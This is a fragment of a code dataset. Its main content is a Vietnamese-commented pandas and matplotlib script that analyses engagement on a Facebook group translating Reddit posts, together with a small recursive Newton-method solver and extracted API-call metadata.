'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['observation'], {'dtype': 'tf.float32'}), '(observation, dtype=tf.float32)\n', (1190, 1221), True, 'import tensorflow as tf\n'), ((1586, 1618), 'numpy.where', 'np.where', (['episode_done', '(0.0)', '(1.0)'], {}), '(episode_done, 0.0, 1.0)\n', (1594, 1618), True, 'import numpy as np\n'), ((1779, 1799), 'numpy.all', 'np.all', (['episode_done'], {}), '(episode_done)\n', (1785, 1799), True, 'import numpy as np\n')]
from typing import Callable import numpy as np def newtonSolver(f: Callable, f_prime: Callable, guess: float, tol: float=10e-6, prev: float=0) -> float: """Newton method solver for 1 dimension, implemented recursively. Arguments: f {Callable} -- Objective function (must have zero root). f_prime {Callable} -- First derivative of objective with respect to the decision variable. guess {float} -- Guess for the decision variable. Keyword Arguments: tol {float} -- Tolerance level (default: {10e-6}). prev {float} -- Guess from previous iteration (for convergence check). Returns: float -- Solution to the function s.t. f(x) = 0. """ # Assigning current guess to x_old x_old = guess # Checking if decision variable changed by less than tolerance level if np.abs(x_old - prev) < tol: return x_old else: # Compute new estimate for x x_new = x_old - (f(x_old) / f_prime(x_old)) return newtonSolver(f=f, f_prime=f_prime, guess=x_new, tol=tol, prev=x_old)
[ "numpy.abs" ]
[((903, 923), 'numpy.abs', 'np.abs', (['(x_old - prev)'], {}), '(x_old - prev)\n', (909, 923), True, 'import numpy as np\n')]
# -*- coding: utf-8 -*- #%% ###################################################### # libraries import pandas as pd import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np from mpl_toolkits.axes_grid1 import AxesGrid import math from scipy import stats # matplotlib params mpl.rcParams["axes.titlesize"] = 24 mpl.rcParams["axes.grid"] = True mpl.rcParams["axes.labelsize"] = 16 mpl.rcParams["xtick.labelsize"] = 14 mpl.rcParams["ytick.labelsize"] = 14 #%% ###################################################### # import data infile = "20170101T000000-20190101T000000.csv" df = pd.read_csv(infile, encoding="utf-8", index_col=None, header=0, lineterminator="\n") totalUnfiltered = df.shape[0] print("Số bài viết tổng cộng: {:d}".format(totalUnfiltered)) ###################################################### # define columns types and filter df["r"] = df["r"].astype("category") df["user_raw_id"] = df["user_raw_id"].astype(np.int64) df["post_raw_id"] = df["post_raw_id"].astype(np.int64) # avoid case sensitive df["r"] = df["r"].str.lower() # time conversion df.drop(df[df["r_created_utc"] == 0].index, inplace=True) # filter df["created_time"]=pd.to_datetime(df["created_time"], format="%Y-%m-%dT%H:%M:%S.000Z", utc=True).dt.tz_convert("Asia/Ho_Chi_Minh") df["r_created_utc"]=pd.to_datetime(df["r_created_utc"], unit="s", utc=True).dt.tz_convert("Asia/Ho_Chi_Minh") df.drop(df[df["created_time"].dt.year == 2019].index, inplace=True) # filter totalFiltered = df.shape[0] print("Số bài viết sau khi lọc: {:d}. Tương đương {:.2f}% tổng số bài.".format(totalFiltered, totalFiltered / totalUnfiltered * 100)) ###################################################### # determine week day of post vietnameseDaysOfWeek = ['Hai', 'Ba', 'Tư', 'Năm', 'Sáu', 'Bảy', 'CN'] df["weekday"] = df["created_time"].dt.weekday df["weekday"] = df["weekday"].astype("category") r = pd.crosstab(index=df["r"], columns="count") r.sort_values(by="count", ascending=False, inplace=True) ###################################################### # interests mesure interests = df.groupby("r")["likes_count", "comments_count"].sum() interests["sum"] = interests["likes_count"] + interests["comments_count"] interests.sort_values(by="sum", ascending=False, inplace=True) ###################################################### # prepare hour stats numWeeks = math.ceil((df.iloc[-1]["created_time"] - df.iloc[0]["created_time"]).days/7) def meanPostsPerWeek(series): return np.size(series) / numWeeks dfWeekdayHourPerSub = df.pivot_table(index=["r", df["created_time"].dt.hour], columns="weekday", values=["likes_count", "post_id"], aggfunc={"likes_count": np.mean, "post_id": meanPostsPerWeek}, fill_value=0) ###################################################### # translators stats translators = df[["user_raw_id", "user_name"]].copy() translators.drop_duplicates(subset="user_raw_id", keep='first', inplace=True) translators.set_index("user_raw_id", inplace=True) translatorsStats = df.pivot_table(index="user_raw_id", values=["likes_count", "post_id"], aggfunc={"likes_count": [np.sum, np.mean], "post_id": [np.size, meanPostsPerWeek]}, fill_value=0) #%% ###################################################### # retrospect memory usage df.info(memory_usage='deep') for dtype in list(set(df.dtypes)): selected_dtype = df.select_dtypes(include=[dtype]) sumUsageB = selected_dtype.memory_usage(deep=True).sum() sumUsageMB = sumUsageB / 1024 ** 2 print("Sum memory usage for {} columns: {:03.2f} MB".format(dtype,sumUsageMB)) print("Usage of each column in MB") for colName, usageB in df.memory_usage(index=True, deep=True).items(): print("{:<20} {:10.2f} MB".format(colName, usageB / 1024 ** 2)) del dtype, selected_dtype, sumUsageB, sumUsageMB, colName, usageB #%% ###################################################### # posts by month df["created_time_utc"] = df["created_time"].dt.tz_convert('UTC') grouperAllByMonth = df.groupby(by=pd.Grouper(freq="M", key="created_time_utc")) allPostsByMonth = grouperAllByMonth["post_id"].size().fillna(0) allLikesByMonth = grouperAllByMonth["likes_count"].sum().fillna(0) fig = plt.figure() plt.title("Thống kê tổng số post và like") monthLabels = allPostsByMonth.index.strftime("%m-%Y").tolist() ax1 = fig.add_subplot(111) ax1.plot(monthLabels, allPostsByMonth, "r-", label="Post") ax1.set_xlabel("Tháng") ax1.set_ylabel("Số bài viết") ax2 = ax1.twinx() ax2.plot(monthLabels, allLikesByMonth, "b-", label="Like") ax2.set_ylabel("Số like") ax2.grid(False) fig.autofmt_xdate() handles, labels = [],[] for ax in fig.axes: for h, l in zip(*ax.get_legend_handles_labels()): handles.append(h) labels.append(l) plt.legend(handles, labels, loc="upper left") plt.show() del grouperAllByMonth, allPostsByMonth, allLikesByMonth, handles, labels, h, l, fig, ax1, ax2 df.drop("created_time_utc", axis=1, inplace=True) #%% ###################################################### # hot subreddits subs = r.index.nunique() print("Số subreddit được dịch: {:d}".format(subs)) print("Số bài dịch mỗi sub trung bình: {:f}".format(float(r.mean()))) subsGreater1 = (r > 1).sum()[0] print("Số subreddit có trên 1 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater1, subsGreater1 / subs * 100)) subsGreater10 = (r > 10).sum()[0] print("Số subreddit có trên 10 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater10, subsGreater10 / subs * 100)) subsGreater100 = (r > 100).sum()[0] print("Số subreddit có trên 100 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater100, subsGreater100 / subs * 100)) del subs, subsGreater1, subsGreater10, subsGreater100 #%% ###################################################### # top translated subreddits N = 30 rTop = r.head(N) y = np.arange(N) fig, ax = plt.subplots() plt.barh(y, rTop["count"]) plt.title("Những Subreddit nhiều bài dịch nhất") plt.xlabel("Số bài được dịch") plt.yticks(y, rTop.index.tolist()) for i in ax.patches: ax.text(i.get_width() + .1, i.get_y() + 0.5, str(int(i.get_width())), color="black", fontsize=14) ax.invert_yaxis() ax.grid(False) plt.show() del N, rTop, y, i, fig, ax #%% ###################################################### # top interested subreddits Ni = 30 yi = np.arange(Ni) ax = interests.iloc[0:Ni][["likes_count","comments_count"]].plot.barh(stacked=True) plt.title("Những Subreddit được chú ý nhất") plt.xlabel("Tổng số cảm xúc và bình luận") plt.yticks(yi, r.head(Ni).index.tolist()) plt.ylabel("") for i, subreddit in enumerate(interests[0:Ni].index.tolist()): s = interests.loc[subreddit]["sum"] ax.annotate(str(s), (s, i + .1), color="black", fontsize=14) ax.invert_yaxis() ax.grid(False) del Ni, yi, ax, i, subreddit, s #%% ###################################################### # askreddit's comments ratioCommentsCount = interests["comments_count"][0] / interests["comments_count"] ratioCommentsCount = ratioCommentsCount.drop("askreddit") ratioCommentsCount = ratioCommentsCount.replace(np.inf, np.nan).dropna() print("askreddit có số comment nhiều hơn các sub khác {:.2f} lần trở lên.".format(float(ratioCommentsCount.min()))) del ratioCommentsCount #%% ###################################################### # mean interests meanInterests = df.groupby("r")["likes_count", "comments_count"].mean() N = 30 for i in range(N): subreddit = interests.index[i] print("Trung bình một bài {:s} sẽ có {:.0f} like (cảm xúc) và {:.0f} bình luận.".format(subreddit, meanInterests.loc[subreddit]["likes_count"], meanInterests.loc[subreddit]["comments_count"])) # print("{} & {:.0f} & {:.0f} \\\\\n\\hline".format(subreddit, meanInterests.loc[subreddit]["likes_count"], meanInterests.loc[subreddit]["comments_count"])) print("Còn trung bình toàn thể là {:.0f} like (cảm xúc) và {:.0f} bình luận.".format(df["likes_count"].mean(), df["comments_count"].mean())) del meanInterests, N, i, subreddit #%% ###################################################### # posts per month overall grouperByRMonth = df.groupby(["r", pd.Grouper(freq="M", key="created_time")]) countRByMonth = grouperByRMonth["post_id"].count().unstack("r").fillna(0) Nr = 15 fig, ax = plt.subplots() plt.set_cmap("nipy_spectral") monthLabels = countRByMonth.index.strftime("%m-%Y").tolist() for subreddit in r.index[0:Nr-1].tolist(): ax.plot(monthLabels, countRByMonth[subreddit].tolist(), label=subreddit) plt.title("Số bài dịch mỗi sub theo thời gian") plt.ylabel("") plt.xlabel("") fig.autofmt_xdate() ax.legend() plt.show() del grouperByRMonth, countRByMonth, Nr, fig, ax, monthLabels, subreddit #%% ###################################################### # mean likes per hour overall dfMeanLikesWeekdayHour = df.pivot_table(index=df["created_time"].dt.hour, columns="weekday", values="likes_count", aggfunc="mean") fig, ax = plt.subplots() im = ax.imshow(dfMeanLikesWeekdayHour, cmap="Reds", aspect="auto") ax.set_xticks(np.arange(len(vietnameseDaysOfWeek))) ax.set_xticklabels(vietnameseDaysOfWeek) ax.grid(False) plt.title("Like trung bình theo giờ đăng") plt.ylabel("Giờ") plt.xlabel("Thứ") plt.colorbar(im, ax=ax) plt.show() del dfMeanLikesWeekdayHour, fig, ax, im #%% ###################################################### # mean posts per hour overall dfMeanPostsWeekdayHour = df.pivot_table(index=df["created_time"].dt.hour, columns="weekday", values="post_id", aggfunc=np.size)/numWeeks fig, ax = plt.subplots() im = ax.imshow(dfMeanPostsWeekdayHour, cmap="Reds", aspect="auto") ax.set_xticks(np.arange(len(vietnameseDaysOfWeek))) ax.set_xticklabels(vietnameseDaysOfWeek) ax.grid(False) plt.title("Số bài trung bình theo giờ đăng") plt.ylabel("Giờ") plt.xlabel("Thứ") plt.colorbar(im, ax=ax) plt.show() del dfMeanPostsWeekdayHour, fig, ax, im #%% ###################################################### # mean likes per hour per sub Nrow = 2 Ncol = 4 Noffset = 0 listTopSubs = r.index[Noffset:(Noffset+Nrow*Ncol)].tolist() fig = plt.figure() grid = AxesGrid(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True, label_mode="L", cbar_location="right", cbar_mode="single", cbar_pad=0.1, aspect=False) for i in range(Nrow*Ncol): subreddit = listTopSubs[i] imTemp = grid[i].imshow(dfWeekdayHourPerSub.query('r == "{:s}"'.format(subreddit))["likes_count"], cmap="Reds", aspect="auto") grid[i].set_title(subreddit, fontsize=20) grid[i].set_aspect("auto") grid[i].set_xlabel("Thứ") grid[i].set_ylabel("Giờ") grid[i].tick_params(axis="both", labelsize=12) grid[i].grid(False) grid.cbar_axes[0].colorbar(imTemp) grid.axes_llc.set_xticks(np.arange(len(vietnameseDaysOfWeek))) grid.axes_llc.set_xticklabels(vietnameseDaysOfWeek) fig.suptitle("Like trung bình mỗi giờ của {:d} sub nổi nhất".format(Nrow*Ncol), fontsize=24) plt.show() del Nrow, Ncol, Noffset, listTopSubs, fig, grid, i, subreddit, imTemp #%% ###################################################### # mean posts per hour per sub Nrow = 2 Ncol = 4 Noffset = 0 listTopSubs = r.index[Noffset:(Noffset+Nrow*Ncol)].tolist() fig = plt.figure() grid = AxesGrid(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True, label_mode="L", cbar_location="right", cbar_mode="single", cbar_pad=0.1, aspect=False) for i in range(Nrow*Ncol): subreddit = listTopSubs[i] imTemp = grid[i].imshow(dfWeekdayHourPerSub.query('r == "{:s}"'.format(subreddit))["post_id"], cmap="Reds", aspect="auto") grid[i].set_title(subreddit, fontsize=20) grid[i].set_aspect("auto") grid[i].set_xlabel("Thứ") grid[i].set_ylabel("Giờ") grid[i].tick_params(axis="both", labelsize=12) grid[i].grid(False) grid.cbar_axes[0].colorbar(imTemp) grid.axes_llc.set_xticks(np.arange(len(vietnameseDaysOfWeek))) grid.axes_llc.set_xticklabels(vietnameseDaysOfWeek) fig.suptitle("Số post trung bình mỗi giờ của {:d} sub nổi nhất".format(Nrow*Ncol), fontsize=24) plt.show() del Nrow, Ncol, Noffset, listTopSubs, fig, grid, i, subreddit, imTemp #%% ###################################################### # statistics of likes of posts print("Tổng số like: {:d}.".format(df["likes_count"].sum())) print("Số like trung bình mỗi post: {:.2f}".format(df["likes_count"].mean())) print("Số like cao nhất: {:d}".format(df["likes_count"].max())) print("Bài nhiều like nhất: https://www.facebook.com/groups/redditvietnam/permalink/{}/".format(df.loc[df["likes_count"].idxmax()]["post_raw_id"])) #likescountQuantiles = [.1, .25, .5, .75, .9, .99] #for i in likescountQuantiles: # print("{:.0%} bài có trên {:.0f} like.".format(1 - i, df["likes_count"].quantile(i))) likescountMarkpoints = [100, 300, 500, 1000, 2000, 4000, 6000, 8000] for i in likescountMarkpoints: p = (df["likes_count"] >= i).sum() print("Có {:d} bài ({:.2%}) đạt {:d} like trở lên.".format(p, p / totalFiltered, i)) fig, ax = plt.subplots() likescountBins = range(0, 4000, 100) df.hist(column="likes_count", grid=True, xlabelsize=14, ylabelsize=14, bins=likescountBins, ax=ax) plt.title("Phân bố số like") plt.xlabel("Số like") plt.ylabel("Số bài viết") plt.show() del likescountMarkpoints, i, p, fig, ax, likescountBins #%% ###################################################### # estimate distribution sc = 500 reducedLikescount = df["likes_count"].copy() / sc l = np.arange(0, 4000 / sc, 100 / (sc * 2)) param = stats.lognorm.fit(reducedLikescount) pdfFitted = stats.lognorm.pdf(l, param[0], param[1], param[2]) fig = plt.figure() plt.hist(reducedLikescount, bins=l, density=True) plt.plot(l, pdfFitted, "r-") plt.title("Ước lượng phân bố") plt.xlabel("Số bài viết (đơn vị: {:d} bài)".format(sc)) plt.ylabel("Mật độ") kstest = stats.kstest(reducedLikescount, 'lognorm', param) plt.text(7, 0.5, "Model: lognorm\nShape = {:f}\nLoc = {:f}\nScale = {:f}\nKS-test:\nD = {:f}\np-value: {:f}".format(param[0], param[1], param[2], kstest.statistic, kstest.pvalue), fontsize=16) plt.show() del sc, reducedLikescount, l, param, pdfFitted, fig, kstest #%% ###################################################### # statistics of translators print("Tổng số dịch giả: {:d}".format(translators.size)) print("Mỗi dịch giả trung bình dịch {:.0f} bài.".format(totalFiltered / translators.size)) print("Dịch giả chăm chỉ nhất: {} (https://facebook.com/{}) với {} bài.".format(translators.loc[translatorsStats[('post_id', 'size')].idxmax()]["user_name"], translatorsStats[('post_id', 'size')].idxmax(), translatorsStats[('post_id', 'size')].max())) print("Dịch giả dễ thương nhất: {} (https://facebook.com/{}) với tổng cộng {} like.".format(translators.loc[translatorsStats[('likes_count', 'sum')].idxmax()]["user_name"], translatorsStats[('likes_count', 'sum')].idxmax(), translatorsStats[('likes_count', 'sum')].max())) print("Dịch giả hay được cưng yêu nhất: {} (https://facebook.com/{}) với trung bình {:.0f} like mỗi bài.".format(translators.loc[translatorsStats[('likes_count', 'mean')].idxmax()]["user_name"], translatorsStats[('likes_count', 'mean')].idxmax(), translatorsStats[('likes_count', 'mean')].max())) postscountMarkpoints = [10, 20, 50, 100, 200] for i in postscountMarkpoints: p = (translatorsStats[("post_id", "size")] >= i).sum() print("{:d} dịch giả ({:.2%}) có {:d} bài dịch trở lên.".format(p, p / translators.size, i)) del postscountMarkpoints, i, p #%% ###################################################### # reddit posts verification patternStr = r"https?://www\.reddit\.com/r/\w+/comments/(\w{1,6})/|https?://redd\.it/(\w{1,6})" dfLinks = df["message"].str.extractall(patternStr) dfLinksList = dfLinks.groupby(level=0)[0].apply(list) + dfLinks.groupby(level=0)[1].apply(list) dfLinksListCount = dfLinksList.apply(lambda x: len(set([y for y in x if str(y) != 'nan']))) multilinksSubmissionCount = (dfLinksListCount > 1).sum() print("Số bài dịch có 2 link reddit trở lên trong bài là {:d}, chiếm {:.2%} tổng số bài.".format(multilinksSubmissionCount, multilinksSubmissionCount / totalFiltered)) del patternStr, dfLinks, dfLinksList, dfLinksListCount, multilinksSubmissionCount #%% ###################################################### # ratio of karma and comments on submissions meanKarma, meanCommentsCount = df[["r_score", "r_num_comments"]].mean() print("Karma trung bình: {:.0f}.".format(meanKarma)) print("Số bình luận trung bình: {:.0f}.".format(meanCommentsCount)) print("Tỉ lệ Karma trên bình luận: {:.2f}.".format(meanKarma / meanCommentsCount)) del meanKarma, meanCommentsCount #%% ###################################################### # choice of submission and interest reception dfChoices = df[["r", "r_score", "likes_count", "created_time", "r_created_utc"]].copy() dfChoices["delta"] = dfChoices["created_time"] - dfChoices["r_created_utc"] # minor filter irr = (dfChoices["delta"].dt.days < 0).sum() print("{:d} bài có delta < 0, chiếm {:.2%} tổng số.".format(irr, irr / totalFiltered)) dfChoices.drop(dfChoices[dfChoices["delta"].dt.days < 0].index, inplace=True) # convert delta to days in float dfChoices["days_f"] = dfChoices["delta"] / np.timedelta64(1, "D") # general stats print("Khoảng cách xa nhất: {}. Link: https://www.facebook.com/groups/redditvietnam/permalink/{}.".format(dfChoices["delta"].max(), df.loc[dfChoices["delta"].idxmax()]["post_raw_id"])) delays = [1, 7, 14, 30, 90, 180, 360, 720, 1080, 1800] sampleSize = len(dfChoices.index) for i in delays: p = (dfChoices["days_f"] >= i).sum() print("{:d} submission ({:.2%}) được dịch sau {:d} ngày.".format(p, p / sampleSize, i)) # distribution of delays fig1, ax1 = plt.subplots() bins = np.arange(0, 3500, 100) ax1.hist(dfChoices["days_f"], bins=bins, rwidth=0.8) ax1.set_title("Bao lâu submission mới được dịch?") ax1.set_xlabel("Số ngày") ax1.set_ylabel("Số bài") fig1.show() # distribution of delays, karma and likes fig2, ax2 = plt.subplots() g2 = ax2.scatter(dfChoices["r_score"].values, dfChoices["days_f"].values, c=dfChoices["likes_count"].values, cmap="YlOrBr", edgecolors="None", s=30, marker="o", alpha=0.7) ax2.set_title("Tương tác của submission trên Reddit và RedditVN") ax2.set_xlabel("Karma trên Reddit", fontsize=16) ax2.set_ylabel("Khoảng cách giữa bài dịch và bài gốc (ngày)") fig2.colorbar(g2, ax=ax2) fig2.show() # cropped distribution of delays, karma and likes def plotCrop(rScoreCrop, daysFCrop): dfChoicesCrop = dfChoices[(dfChoices["r_score"] < rScoreCrop) & (dfChoices["days_f"] < daysFCrop)] fig3, ax3 = plt.subplots() g3 = ax3.scatter(dfChoicesCrop["r_score"].values, dfChoicesCrop["days_f"].values, c=dfChoicesCrop["likes_count"].values, cmap="YlOrBr", edgecolors="None", s=30, marker="o", alpha=0.7) ax3.set_title("Tương tác của submission trên Reddit và RedditVN") ax3.set_xlabel("Karma trên Reddit") ax3.set_ylabel("Khoảng cách giữa bài dịch và bài gốc (ngày)") fig3.colorbar(g3, ax=ax3) fig3.show() # distribution of karma and likes fig4 = plt.figure() ax4 = fig4.add_subplot(121) ax4.scatter(dfChoicesCrop["r_score"].values, dfChoicesCrop["likes_count"].values, alpha=0.7, marker=".") ax4.set_title("So sánh karma và like") ax4.set_xlabel("Karma trên Reddit") ax4.set_ylabel("Like trên Facebook") ax5 = fig4.add_subplot(122) ax5.scatter(dfChoicesCrop["days_f"].values, dfChoicesCrop["likes_count"].values, alpha=0.7, marker=".") ax5.set_title("So sánh độ trễ và like") ax5.set_xlabel("Độ trễ") ax5.set_ylabel("Like trên Facebook") fig4.show() plotCrop(100000, 1200) plotCrop(100000, 7) plotCrop(100000, 1) del irr, dfChoices, delays, sampleSize, i, p, fig1, ax1, bins, fig2, ax2, g2
[ "matplotlib.pyplot.title", "pandas.read_csv", "matplotlib.pyplot.figure", "numpy.arange", "pandas.Grouper", "matplotlib.pyplot.xlabel", "scipy.stats.lognorm.pdf", "matplotlib.pyplot.colorbar", "matplotlib.pyplot.set_cmap", "matplotlib.pyplot.subplots", "scipy.stats.kstest", "numpy.size", "matplotlib.pyplot.show", "math.ceil", "matplotlib.pyplot.legend", "matplotlib.pyplot.barh", "scipy.stats.lognorm.fit", "pandas.to_datetime", "matplotlib.pyplot.ylabel", "pandas.crosstab", "matplotlib.pyplot.hist", "matplotlib.pyplot.plot", "numpy.timedelta64", "mpl_toolkits.axes_grid1.AxesGrid" ]
[((598, 686), 'pandas.read_csv', 'pd.read_csv', (['infile'], {'encoding': '"""utf-8"""', 'index_col': 'None', 'header': '(0)', 'lineterminator': '"""\n"""'}), "(infile, encoding='utf-8', index_col=None, header=0,\n lineterminator='\\n')\n", (609, 686), True, 'import pandas as pd\n'), ((1883, 1926), 'pandas.crosstab', 'pd.crosstab', ([], {'index': "df['r']", 'columns': '"""count"""'}), "(index=df['r'], columns='count')\n", (1894, 1926), True, 'import pandas as pd\n'), ((2351, 2429), 'math.ceil', 'math.ceil', (["((df.iloc[-1]['created_time'] - df.iloc[0]['created_time']).days / 7)"], {}), "((df.iloc[-1]['created_time'] - df.iloc[0]['created_time']).days / 7)\n", (2360, 2429), False, 'import math\n'), ((4142, 4154), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4152, 4154), True, 'import matplotlib.pyplot as plt\n'), ((4155, 4197), 'matplotlib.pyplot.title', 'plt.title', (['"""Thống kê tổng số post và like"""'], {}), "('Thống kê tổng số post và like')\n", (4164, 4197), True, 'import matplotlib.pyplot as plt\n'), ((4689, 4734), 'matplotlib.pyplot.legend', 'plt.legend', (['handles', 'labels'], {'loc': '"""upper left"""'}), "(handles, labels, loc='upper left')\n", (4699, 4734), True, 'import matplotlib.pyplot as plt\n'), ((4735, 4745), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4743, 4745), True, 'import matplotlib.pyplot as plt\n'), ((5783, 5795), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (5792, 5795), True, 'import numpy as np\n'), ((5807, 5821), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5819, 5821), True, 'import matplotlib.pyplot as plt\n'), ((5822, 5848), 'matplotlib.pyplot.barh', 'plt.barh', (['y', "rTop['count']"], {}), "(y, rTop['count'])\n", (5830, 5848), True, 'import matplotlib.pyplot as plt\n'), ((5849, 5897), 'matplotlib.pyplot.title', 'plt.title', (['"""Những Subreddit nhiều bài dịch nhất"""'], {}), "('Những Subreddit nhiều bài dịch nhất')\n", (5858, 5897), True, 'import matplotlib.pyplot as plt\n'), ((5898, 5928), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Số bài được dịch"""'], {}), "('Số bài được dịch')\n", (5908, 5928), True, 'import matplotlib.pyplot as plt\n'), ((6120, 6130), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6128, 6130), True, 'import matplotlib.pyplot as plt\n'), ((6260, 6273), 'numpy.arange', 'np.arange', (['Ni'], {}), '(Ni)\n', (6269, 6273), True, 'import numpy as np\n'), ((6358, 6402), 'matplotlib.pyplot.title', 'plt.title', (['"""Những Subreddit được chú ý nhất"""'], {}), "('Những Subreddit được chú ý nhất')\n", (6367, 6402), True, 'import matplotlib.pyplot as plt\n'), ((6403, 6445), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tổng số cảm xúc và bình luận"""'], {}), "('Tổng số cảm xúc và bình luận')\n", (6413, 6445), True, 'import matplotlib.pyplot as plt\n'), ((6488, 6502), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (6498, 6502), True, 'import matplotlib.pyplot as plt\n'), ((8174, 8188), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (8186, 8188), True, 'import matplotlib.pyplot as plt\n'), ((8189, 8218), 'matplotlib.pyplot.set_cmap', 'plt.set_cmap', (['"""nipy_spectral"""'], {}), "('nipy_spectral')\n", (8201, 8218), True, 'import matplotlib.pyplot as plt\n'), ((8400, 8447), 'matplotlib.pyplot.title', 'plt.title', (['"""Số bài dịch mỗi sub theo thời gian"""'], {}), "('Số bài dịch mỗi sub theo thời gian')\n", (8409, 8447), True, 'import matplotlib.pyplot as plt\n'), ((8448, 8462), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (8458, 8462), True, 'import matplotlib.pyplot as plt\n'), ((8463, 8477), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (8473, 8477), True, 'import matplotlib.pyplot as plt\n'), ((8510, 8520), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8518, 8520), True, 'import matplotlib.pyplot as plt\n'), ((8825, 8839), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (8837, 8839), True, 'import matplotlib.pyplot as plt\n'), ((9015, 9057), 'matplotlib.pyplot.title', 'plt.title', (['"""Like trung bình theo giờ đăng"""'], {}), "('Like trung bình theo giờ đăng')\n", (9024, 9057), True, 'import matplotlib.pyplot as plt\n'), ((9058, 9075), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Giờ"""'], {}), "('Giờ')\n", (9068, 9075), True, 'import matplotlib.pyplot as plt\n'), ((9076, 9093), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Thứ"""'], {}), "('Thứ')\n", (9086, 9093), True, 'import matplotlib.pyplot as plt\n'), ((9094, 9117), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {'ax': 'ax'}), '(im, ax=ax)\n', (9106, 9117), True, 'import matplotlib.pyplot as plt\n'), ((9118, 9128), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9126, 9128), True, 'import matplotlib.pyplot as plt\n'), ((9407, 9421), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (9419, 9421), True, 'import matplotlib.pyplot as plt\n'), ((9597, 9641), 'matplotlib.pyplot.title', 'plt.title', (['"""Số bài trung bình theo giờ đăng"""'], {}), "('Số bài trung bình theo giờ đăng')\n", (9606, 9641), True, 'import matplotlib.pyplot as plt\n'), ((9642, 9659), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Giờ"""'], {}), "('Giờ')\n", (9652, 9659), True, 'import matplotlib.pyplot as plt\n'), ((9660, 9677), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Thứ"""'], {}), "('Thứ')\n", (9670, 9677), True, 'import matplotlib.pyplot as plt\n'), ((9678, 9701), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {'ax': 'ax'}), '(im, ax=ax)\n', (9690, 9701), True, 'import matplotlib.pyplot as plt\n'), ((9702, 9712), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9710, 9712), True, 'import matplotlib.pyplot as plt\n'), ((9940, 9952), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9950, 9952), True, 'import matplotlib.pyplot as plt\n'), ((9960, 10129), 'mpl_toolkits.axes_grid1.AxesGrid', 'AxesGrid', (['fig', '(111)'], {'nrows_ncols': '(Nrow, Ncol)', 'axes_pad': '(0.5)', 'share_all': '(True)', 'label_mode': '"""L"""', 'cbar_location': '"""right"""', 'cbar_mode': '"""single"""', 'cbar_pad': '(0.1)', 'aspect': '(False)'}), "(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True,\n label_mode='L', cbar_location='right', cbar_mode='single', cbar_pad=0.1,\n aspect=False)\n", (9968, 10129), False, 'from mpl_toolkits.axes_grid1 import AxesGrid\n'), ((10766, 10776), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10774, 10776), True, 'import matplotlib.pyplot as plt\n'), ((11035, 11047), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (11045, 11047), True, 'import matplotlib.pyplot as plt\n'), ((11055, 11224), 'mpl_toolkits.axes_grid1.AxesGrid', 'AxesGrid', (['fig', '(111)'], {'nrows_ncols': '(Nrow, Ncol)', 'axes_pad': '(0.5)', 'share_all': '(True)', 'label_mode': '"""L"""', 'cbar_location': '"""right"""', 'cbar_mode': '"""single"""', 'cbar_pad': '(0.1)', 'aspect': '(False)'}), "(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True,\n label_mode='L', cbar_location='right', cbar_mode='single', cbar_pad=0.1,\n aspect=False)\n", (11063, 11224), False, 'from mpl_toolkits.axes_grid1 import AxesGrid\n'), ((11860, 11870), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11868, 11870), True, 'import matplotlib.pyplot as plt\n'), ((12796, 12810), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (12808, 12810), True, 'import matplotlib.pyplot as plt\n'), ((12947, 12975), 'matplotlib.pyplot.title', 'plt.title', (['"""Phân bố số like"""'], {}), "('Phân bố số like')\n", (12956, 12975), True, 'import matplotlib.pyplot as plt\n'), ((12976, 12997), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Số like"""'], {}), "('Số like')\n", (12986, 12997), True, 'import matplotlib.pyplot as plt\n'), ((12998, 13023), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Số bài viết"""'], {}), "('Số bài viết')\n", (13008, 13023), True, 'import matplotlib.pyplot as plt\n'), ((13024, 13034), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (13032, 13034), True, 'import matplotlib.pyplot as plt\n'), ((13239, 13278), 'numpy.arange', 'np.arange', (['(0)', '(4000 / sc)', '(100 / (sc * 2))'], {}), '(0, 4000 / sc, 100 / (sc * 2))\n', (13248, 13278), True, 'import numpy as np\n'), ((13287, 13323), 'scipy.stats.lognorm.fit', 'stats.lognorm.fit', (['reducedLikescount'], {}), 